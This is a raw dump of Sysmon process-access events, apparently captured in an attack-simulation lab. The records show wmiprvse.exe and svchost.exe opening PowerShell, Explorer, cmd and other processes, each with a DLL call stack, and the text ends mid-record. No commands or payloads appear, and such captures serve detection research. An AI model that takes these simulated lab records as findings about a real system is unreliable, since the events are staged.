22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70F5-603D-8988-00000000AD01}8940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program 